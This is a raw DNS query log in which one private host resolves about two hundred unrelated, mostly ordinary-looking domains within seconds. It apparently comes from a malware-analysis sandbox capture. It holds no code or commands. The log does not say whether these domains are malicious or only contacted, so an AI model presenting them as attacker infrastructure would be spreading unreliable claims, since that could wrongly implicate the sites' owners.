Mar 22, 2023 05:44:51.045063972 CET	192.168.2.5	8.8.8.8	0x250f	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.075218916 CET	192.168.2.5	8.8.8.8	0xa273	Standard query (0)	akr.co.id	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.087954998 CET	192.168.2.5	8.8.8.8	0xaaef	Standard query (0)	cjcagent.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.091192961 CET	192.168.2.5	8.8.8.8	0xa56c	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.136776924 CET	192.168.2.5	8.8.8.8	0xa8f3	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.184467077 CET	192.168.2.5	8.8.8.8	0x6e65	Standard query (0)	noblesse.be	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.264749050 CET	192.168.2.5	8.8.8.8	0x63d3	Standard query (0)	umcor.am	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.384119034 CET	192.168.2.5	8.8.8.8	0x8c76	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.486680031 CET	192.168.2.5	8.8.8.8	0x6cfc	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.490833998 CET	192.168.2.5	8.8.8.8	0xbb07	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.588608980 CET	192.168.2.5	8.8.8.8	0x1f29	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.124109983 CET	192.168.2.5	8.8.8.8	0xb3b	Standard query (0)	mkm-gr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.262554884 CET	192.168.2.5	8.8.8.8	0x6228	Standard query (0)	hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.292316914 CET	192.168.2.5	8.8.8.8	0xfb89	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.414205074 CET	192.168.2.5	8.8.8.8	0x74b2	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.116023064 CET	192.168.2.5	8.8.8.8	0x3c4f	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.135600090 CET	192.168.2.5	8.8.8.8	0xe9f6	Standard query (0)	akdeniz.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.235734940 CET	192.168.2.5	8.8.8.8	0x3c7b	Standard query (0)	ossir.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.264477015 CET	192.168.2.5	8.8.8.8	0x6cfc	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.302686930 CET	192.168.2.5	8.8.8.8	0xbfb4	Standard query (0)	ruzee.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.350836992 CET	192.168.2.5	8.8.8.8	0xd60a	Standard query (0)	likangds.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.353204012 CET	192.168.2.5	8.8.8.8	0x99b1	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.353204012 CET	192.168.2.5	8.8.8.8	0x4b67	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.355393887 CET	192.168.2.5	8.8.8.8	0x74d8	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.363656044 CET	192.168.2.5	8.8.8.8	0x3f6f	Standard query (0)	calvinly.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.364295006 CET	192.168.2.5	8.8.8.8	0x2054	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.372359991 CET	192.168.2.5	8.8.8.8	0x5ddf	Standard query (0)	t-mould.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.445255041 CET	192.168.2.5	8.8.8.8	0xb45c	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.463488102 CET	192.168.2.5	8.8.8.8	0xc2c8	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.476273060 CET	192.168.2.5	8.8.8.8	0x8738	Standard query (0)	a-domani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.490072966 CET	192.168.2.5	8.8.8.8	0xc053	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.551182985 CET	192.168.2.5	8.8.8.8	0xb61f	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.574898005 CET	192.168.2.5	8.8.8.8	0x2422	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.599595070 CET	192.168.2.5	8.8.8.8	0xc68a	Standard query (0)	biosolve.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.796968937 CET	192.168.2.5	8.8.8.8	0x8b28	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.028408051 CET	192.168.2.5	8.8.8.8	0x6dc	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.058603048 CET	192.168.2.5	8.8.8.8	0xde4e	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.161330938 CET	192.168.2.5	8.8.8.8	0x6b63	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.173060894 CET	192.168.2.5	8.8.8.8	0xfef7	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.236849070 CET	192.168.2.5	8.8.8.8	0xb53d	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.344588995 CET	192.168.2.5	8.8.8.8	0xcec4	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.511332989 CET	192.168.2.5	8.8.8.8	0xf6a3	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.521090031 CET	192.168.2.5	8.8.8.8	0xa026	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.529396057 CET	192.168.2.5	8.8.8.8	0xa1fb	Standard query (0)	4locals.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.607305050 CET	192.168.2.5	8.8.8.8	0x2422	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.618624926 CET	192.168.2.5	8.8.8.8	0x4951	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.712507010 CET	192.168.2.5	8.8.8.8	0xc5ce	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.725518942 CET	192.168.2.5	8.8.8.8	0x3add	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.787333012 CET	192.168.2.5	8.8.8.8	0x7e48	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.794121027 CET	192.168.2.5	8.8.8.8	0x1fb9	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.841975927 CET	192.168.2.5	8.8.8.8	0xb022	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.853081942 CET	192.168.2.5	8.8.8.8	0xa20c	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.021065950 CET	192.168.2.5	8.8.8.8	0x4973	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.036798954 CET	192.168.2.5	8.8.8.8	0x295b	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.082892895 CET	192.168.2.5	8.8.8.8	0xf3aa	Standard query (0)	haigh-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.107647896 CET	192.168.2.5	8.8.8.8	0xde4e	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.134226084 CET	192.168.2.5	8.8.8.8	0xe7f6	Standard query (0)	shztm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.152291059 CET	192.168.2.5	8.8.8.8	0x94a2	Standard query (0)	mjrcpas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.262603045 CET	192.168.2.5	8.8.8.8	0xfe0d	Standard query (0)	hamaker.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.276850939 CET	192.168.2.5	8.8.8.8	0xe42e	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.328819036 CET	192.168.2.5	8.8.8.8	0xe498	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.368292093 CET	192.168.2.5	8.8.8.8	0xc003	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.461682081 CET	192.168.2.5	8.8.8.8	0x270e	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.477440119 CET	192.168.2.5	8.8.8.8	0x3fab	Standard query (0)	nels.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.579271078 CET	192.168.2.5	8.8.8.8	0x566b	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.692147017 CET	192.168.2.5	8.8.8.8	0xcec4	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.692461967 CET	192.168.2.5	8.8.8.8	0xe2c1	Standard query (0)	linac.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.727322102 CET	192.168.2.5	8.8.8.8	0x3d55	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.760837078 CET	192.168.2.5	8.8.8.8	0x7904	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.967428923 CET	192.168.2.5	8.8.8.8	0xf4d7	Standard query (0)	aba.org.eg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.158725977 CET	192.168.2.5	8.8.8.8	0x3685	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.241908073 CET	192.168.2.5	8.8.8.8	0xc25	Standard query (0)	fifa-ews.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.244235039 CET	192.168.2.5	8.8.8.8	0x5835	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.247451067 CET	192.168.2.5	8.8.8.8	0xd1d5	Standard query (0)	araax.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.376749039 CET	192.168.2.5	8.8.8.8	0xd19f	Standard query (0)	linac.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.463282108 CET	192.168.2.5	8.8.8.8	0xbfa	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.497752905 CET	192.168.2.5	8.8.8.8	0x2557	Standard query (0)	cbaben.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.498342037 CET	192.168.2.5	8.8.8.8	0x4436	Standard query (0)	portoccd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.498929977 CET	192.168.2.5	8.8.8.8	0x25e	Standard query (0)	kavram.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.500669956 CET	192.168.2.5	8.8.8.8	0x8578	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.502751112 CET	192.168.2.5	8.8.8.8	0xe889	Standard query (0)	mjrcpas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.527184010 CET	192.168.2.5	8.8.8.8	0xabb	Standard query (0)	xinhui.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.530149937 CET	192.168.2.5	8.8.8.8	0x9bef	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.556090117 CET	192.168.2.5	8.8.8.8	0xf9ce	Standard query (0)	kairel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.578926086 CET	192.168.2.5	8.8.8.8	0x6bb0	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.584454060 CET	192.168.2.5	8.8.8.8	0x367a	Standard query (0)	gbp-jp.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.643731117 CET	192.168.2.5	8.8.8.8	0xf29b	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.648129940 CET	192.168.2.5	8.8.8.8	0x8358	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.649184942 CET	192.168.2.5	8.8.8.8	0xac8a	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.713112116 CET	192.168.2.5	8.8.8.8	0x59a0	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.763083935 CET	192.168.2.5	8.8.8.8	0x2794	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.886126995 CET	192.168.2.5	8.8.8.8	0x6cac	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.888442993 CET	192.168.2.5	8.8.8.8	0x5bff	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.900063992 CET	192.168.2.5	8.8.8.8	0x2e6	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.965287924 CET	192.168.2.5	8.8.8.8	0xb937	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.016541004 CET	192.168.2.5	8.8.8.8	0x189	Standard query (0)	haigh-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.163072109 CET	192.168.2.5	8.8.8.8	0x1c33	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.221354008 CET	192.168.2.5	8.8.8.8	0xf6ea	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.221522093 CET	192.168.2.5	8.8.8.8	0xa2c1	Standard query (0)	haigh-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.225771904 CET	192.168.2.5	8.8.8.8	0xdca2	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.242266893 CET	192.168.2.5	8.8.8.8	0x875d	Standard query (0)	lyto.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.300415039 CET	192.168.2.5	8.8.8.8	0x7702	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.309741020 CET	192.168.2.5	8.8.8.8	0x5a53	Standard query (0)	xsui.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.317176104 CET	192.168.2.5	8.8.8.8	0x808c	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.320718050 CET	192.168.2.5	8.8.8.8	0x7a41	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.326384068 CET	192.168.2.5	8.8.8.8	0xc785	Standard query (0)	hbfuels.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.327828884 CET	192.168.2.5	8.8.8.8	0x999b	Standard query (0)	fundeo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.338706970 CET	192.168.2.5	8.8.8.8	0x92a0	Standard query (0)	haigh-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.353743076 CET	192.168.2.5	8.8.8.8	0x1f57	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.367548943 CET	192.168.2.5	8.8.8.8	0xabdf	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.370539904 CET	192.168.2.5	8.8.8.8	0xf167	Standard query (0)	gbp-jp.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.371011972 CET	192.168.2.5	8.8.8.8	0xce01	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.371011972 CET	192.168.2.5	8.8.8.8	0x5d94	Standard query (0)	isom.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.451455116 CET	192.168.2.5	8.8.8.8	0x70d9	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.487976074 CET	192.168.2.5	8.8.8.8	0x81b	Standard query (0)	gcss.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.561467886 CET	192.168.2.5	8.8.8.8	0x9bef	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.567950010 CET	192.168.2.5	8.8.8.8	0x5b5	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.575794935 CET	192.168.2.5	8.8.8.8	0x25f1	Standard query (0)	bidroll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.625174999 CET	192.168.2.5	8.8.8.8	0x1008	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.630435944 CET	192.168.2.5	8.8.8.8	0xb44c	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.630649090 CET	192.168.2.5	8.8.8.8	0xd733	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.630776882 CET	192.168.2.5	8.8.8.8	0x3111	Standard query (0)	tcpoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.631478071 CET	192.168.2.5	8.8.8.8	0x63f1	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.767142057 CET	192.168.2.5	8.8.8.8	0x32d2	Standard query (0)	aiolos-sa.gr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.774626017 CET	192.168.2.5	8.8.8.8	0x3e6b	Standard query (0)	webways.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.780457020 CET	192.168.2.5	8.8.8.8	0x13d7	Standard query (0)	www.pb-games.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.796725988 CET	192.168.2.5	8.8.8.8	0x96ad	Standard query (0)	zugseil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.859818935 CET	192.168.2.5	8.8.8.8	0x4517	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.861306906 CET	192.168.2.5	8.8.8.8	0x5b93	Standard query (0)	adventist.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.976490974 CET	192.168.2.5	8.8.8.8	0x217a	Standard query (0)	xinhui.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.984052896 CET	192.168.2.5	8.8.8.8	0x8702	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.987839937 CET	192.168.2.5	8.8.8.8	0x31f2	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.988002062 CET	192.168.2.5	8.8.8.8	0x1e6e	Standard query (0)	aiolos-sa.gr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.992511034 CET	192.168.2.5	8.8.8.8	0x8933	Standard query (0)	awal.ws	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.999097109 CET	192.168.2.5	8.8.8.8	0x9ddd	Standard query (0)	sinwal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.016093016 CET	192.168.2.5	8.8.8.8	0x493	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.033155918 CET	192.168.2.5	8.8.8.8	0xe54b	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.086384058 CET	192.168.2.5	8.8.8.8	0x702f	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.306495905 CET	192.168.2.5	8.8.8.8	0x1295	Standard query (0)	cjborden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.319221020 CET	192.168.2.5	8.8.8.8	0x3efc	Standard query (0)	gbp-jp.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.319638014 CET	192.168.2.5	8.8.8.8	0x6f40	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.430085897 CET	192.168.2.5	8.8.8.8	0x6797	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.431973934 CET	192.168.2.5	8.8.8.8	0x6015	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.432862043 CET	192.168.2.5	8.8.8.8	0x19d3	Standard query (0)	diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.439960003 CET	192.168.2.5	8.8.8.8	0x8f3	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.473232985 CET	192.168.2.5	8.8.8.8	0xe06a	Standard query (0)	mackusick.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.520498991 CET	192.168.2.5	8.8.8.8	0x92c	Standard query (0)	camamat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.543596983 CET	192.168.2.5	8.8.8.8	0xd718	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.557353973 CET	192.168.2.5	8.8.8.8	0x2549	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.557414055 CET	192.168.2.5	8.8.8.8	0x1f92	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.562973976 CET	192.168.2.5	8.8.8.8	0x9bef	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.652859926 CET	192.168.2.5	8.8.8.8	0x6f19	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.664047956 CET	192.168.2.5	8.8.8.8	0x1479	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.781209946 CET	192.168.2.5	8.8.8.8	0xbaa2	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.785361052 CET	192.168.2.5	8.8.8.8	0x473d	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.794055939 CET	192.168.2.5	8.8.8.8	0x4d34	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.855761051 CET	192.168.2.5	8.8.8.8	0x9bd6	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.867013931 CET	192.168.2.5	8.8.8.8	0x3953	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.998012066 CET	192.168.2.5	8.8.8.8	0x80d3	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.001990080 CET	192.168.2.5	8.8.8.8	0x3563	Standard query (0)	kevyt.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.003176928 CET	192.168.2.5	8.8.8.8	0x3ee2	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.112346888 CET	192.168.2.5	8.8.8.8	0x4110	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.303401947 CET	192.168.2.5	8.8.8.8	0x61b4	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.365355015 CET	192.168.2.5	8.8.8.8	0x44bc	Standard query (0)	softizer.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.408618927 CET	192.168.2.5	8.8.8.8	0x1438	Standard query (0)	yasuma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.567506075 CET	192.168.2.5	8.8.8.8	0x5bd9	Standard query (0)	mjrcpas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.721471071 CET	192.168.2.5	8.8.8.8	0x454d	Standard query (0)	vdoherty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.721472025 CET	192.168.2.5	8.8.8.8	0xa34c	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.721556902 CET	192.168.2.5	8.8.8.8	0xf029	Standard query (0)	host.do	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.725559950 CET	192.168.2.5	8.8.8.8	0x3278	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.755033016 CET	192.168.2.5	8.8.8.8	0x8224	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.765127897 CET	192.168.2.5	8.8.8.8	0xf388	Standard query (0)	esmoke.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.773022890 CET	192.168.2.5	8.8.8.8	0xfe80	Standard query (0)	mondopp.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.787842989 CET	192.168.2.5	8.8.8.8	0x707c	Standard query (0)	zugseil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.802684069 CET	192.168.2.5	8.8.8.8	0x26a1	Standard query (0)	nt-hat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.817986012 CET	192.168.2.5	8.8.8.8	0x166	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.941992044 CET	192.168.2.5	8.8.8.8	0x2f17	Standard query (0)	dbnet.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.944516897 CET	192.168.2.5	8.8.8.8	0xdcbc	Standard query (0)	pleszew.policja.gov.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.952212095 CET	192.168.2.5	8.8.8.8	0xd4c	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.017702103 CET	192.168.2.5	8.8.8.8	0x295d	Standard query (0)	lpver.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.102921009 CET	192.168.2.5	8.8.8.8	0x14cd	Standard query (0)	adeesa.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.153801918 CET	192.168.2.5	8.8.8.8	0x35b5	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.157475948 CET	192.168.2.5	8.8.8.8	0xef7d	Standard query (0)	plaske.ua	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.176119089 CET	192.168.2.5	8.8.8.8	0xda3f	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.212567091 CET	192.168.2.5	8.8.8.8	0xfb01	Standard query (0)	cyclad.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.295207024 CET	192.168.2.5	8.8.8.8	0x95ef	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.374713898 CET	192.168.2.5	8.8.8.8	0x824a	Standard query (0)	sjbmw.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.424125910 CET	192.168.2.5	8.8.8.8	0x7b93	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.430707932 CET	192.168.2.5	8.8.8.8	0xb578	Standard query (0)	akdeniz.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.542061090 CET	192.168.2.5	8.8.8.8	0xaf48	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.638761997 CET	192.168.2.5	8.8.8.8	0x9bef	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.642837048 CET	192.168.2.5	8.8.8.8	0x6ab4	Standard query (0)	forbin.net	A (IP address)	IN (0x0001)	false
